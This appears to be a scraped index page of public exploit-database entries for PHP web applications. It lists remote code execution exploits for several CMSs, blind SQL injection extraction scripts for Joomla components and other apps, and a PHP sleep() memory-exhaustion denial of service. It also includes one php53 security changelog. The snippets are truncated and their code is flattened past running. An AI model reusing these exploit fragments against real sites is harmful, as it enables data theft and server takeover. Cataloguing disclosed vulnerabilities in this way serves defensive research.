MyCMS <= 0.9.8 - Remote Command Execution Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo MyCMS = 0.9.8 Remote Command Execution Exploit by BlackHawk [email protected] http://itablackhawk.altervista.org Thanks to rgod for the php code and Marty for the Love ; if $argc3 echo Usage: php .$argv0. Host Path C...
PHPNuke 6.x Category Parameter SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/9630/info It has been reported that PHPNuke may be prone to a SQL injection vulnerability, due to insufficient sanitization of user-supplied input. The problem is reported to exist in the $category variable contained within the...
Jieqi CMS <= 1.5 - Remote Code Execution Exploit
No description provided by source. ?php printr' +---------------------------------------------------------------------------+ Jieqi cms = 1.5 remote code execution exploit by Securitylab.ir mail: [email protected] +---------------------------------------------------------------------------+ '; ...
PhpCommander <= 3.0 (upload) Remote Code Execution Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? $devilteam = [ASCII-art banner]...
php53 security, bug fix and enhancement update
5.3.3-21 - add security fix for CVE-2013-4248 5.3.3-20 - add security fix for CVE-2013-4113 5.3.3-19 - add upstream reproducer for errorhandler 951075 5.3.3-18 - add security fixes for CVE-2006-7243 5.3.3-17 - reorder security patches - add security fixes for CVE-2012-2688, CVE-2012-0831,...
Family Connections CMS 2.5.02.7.1 - less.php Remote Command Execution
Family Connections CMS 2.5.02.7.1 - less.php Remote Command Execution $theme = isset$argv1 ? $argv1 : 'default'; system"clear"; if fileexists"$dir/themes/$theme/style.css" echo "\n themes/$theme/style.css already exists.\n\n"; echo "Overwrite y/n ? "; $handle = fopen "php://stdin","r"; $line =...
PHP168 V6.01/6.02 privilege escalation and local path disclosure vulnerability
The PHP168 whole-site system is currently the most powerful site-building system in the PHP field. The code is fully open source and very convenient for secondary development, all modules can be freely installed and removed, and individual users can use it completely free of charge. PHPCMS V6.01: there is a serious security...
com_jembed - catid Blind SQL Injection
comjembed - catid Blind SQL Injection 1 $url = $argv1; $r = strlenfilegetcontents$url."+and+1=1--"; echo "\nExploiting:\n"; $w = strlenfilegetcontents$url."+and+1=0--"; $t = abs100-$w/$r100; echo "Username: "; for $i=1; $i $t-1 $count = $i; $i = 30; for $j = 1; $j $t-1 $laenge =...
Joomla! Component com_gsticketsystem - 'catid' Blind SQL Injection
1 $url = $argv1; $r = strlenfilegetcontents$url."+and+1=1--"; echo "\nExploiting:\n"; $w = strlenfilegetcontents$url."+and+1=0--"; $t = abs100-$w/$r100; echo "Username: "; for $i=1; $i $t-1 $count = $i; $i = 30; for $j = 1; $j $count; $j++ for $i = 46; $i = 122; $i=$i+2 if $i == 60 $i = 98; $laen...
Jieqi CMS 1.5 - Remote Code Execution
Jieqi CMS 1.5 - Remote Code Execution test"; $str = filegetcontents$url.$cmd; if filegetcontents$shell == 'test' exit"Expoilt Success!\nView Your shell:\t$shell\n"; else exit"Exploit Failed!\n"; ? milw0rm.com 2009-05-18...
Joomla! Component com_digistore - 'pid' Blind SQL Injection
1 $url = $argv1; $r = strlenfilegetcontents$url."+and+1=1--"; echo "\nExploiting:\n"; $w = strlenfilegetcontents$url."+and+1=0--"; $t = abs100-$w/$r100; echo "Username: "; for $i=1; $i $t-1 $count = $i; $i = 30; for $j = 1; $j $t-1 $laenge = strlen...
Joomla com_pcchess (game_id) Blind SQL Injection Exploit
Exploit for unknown platform in category web applications. Joomla com_pcchess (game_id) Blind SQL Injection Exploit...
pLink 2.07 - linkto.php Blind SQL Injection
pLink 2.07 - linkto.php Blind SQL Injection php '.$argv0.' http://www.site.com/link/linkto.php?id=128 2 Live Demo : http://www.uni-leipzig.de/fsrpowi/link/linkto.php?id=128 2 '; if $argc 1 $url = $argv1; if $argc 3 $userid = 1; else $userid = $argv2; $r = strlenfilegetcontents$url."+and+1=1/"; ec...
PHP 5.2.6 sleep() Local Memory Exhaust Exploit
No description provided by source. `<?php sleep(9999999); echo 'Hello World'; ?>` Will print hello world after 9999999 seconds... so max_execution_time simply doesn't work :P Why? We can find in manual:...
function sleep() in all versions of PHP
There is a quite big problem with the sleep function in PHP. The max_execution_time set to 60 sec. in safe mode can easily be bypassed by using the sleep function, for example with this script: `<?php sleep(9999999); echo 'Hello World'; ?>` Will print hello world after 9999999 seconds... so max_execution_time simply doesn't wo...
PHP 5.2.6 sleep() Local Memory Exhaust Exploit
Exploit for multiple platform in category dos / poc. PHP 5.2.6 sleep() Local Memory Exhaust Exploit. There is some kind of issue in PHP we can run out memory even on SAFEMODE script simply allocate maximum o...
PHP 5.2.6 - 'sleep()' Local Memory Exhaust
There is some kind of issue in PHP we can run out memory even on SAFEMODE script simply allocate maximum of memory and go to sleep for, let's say 9999999 seconds. sleep() pass 'max_execution_time' setting. Ram eater sploit ? if ! $purl = @parseurl$url die'sorry, parseurl function disabled Oo'; if !...
php526-dos.txt
Will print hello world after 9999999 seconds... so max_execution_time simply doesn't work :P Why? We can find in manual: "max_execution_time only affect the execution time of the script itself. Any time spent on activity that happens outside the execution of the script such as system calls using system...
PHP 5.2.6 - sleep() Local Memory Exhaust
PHP 5.2.6 - sleep() Local Memory Exhaust. There is some kind of issue in PHP we can run out memory even on SAFEMODE script simply allocate maximum of memory and go to sleep for, let's say 9999999 seconds. sleep() pass 'max_execution_time' setting. Ram eater sploit ? if ! $purl = @parseurl$url die'sorry,...
Vortex CMS (index.php pageid) Blind SQL Injection Exploit
No description provided by source. ?php iniset"maxexecutiontime",0; printr' Vortex CMS - Blind SQL Injection Exploit Vulnerability discovered by: LidlosesAuge Exploit coded by: LidlosesAuge Greetz to: -=Player=- , Suicide, g4ms3, enco GPM, Free-Hack &n...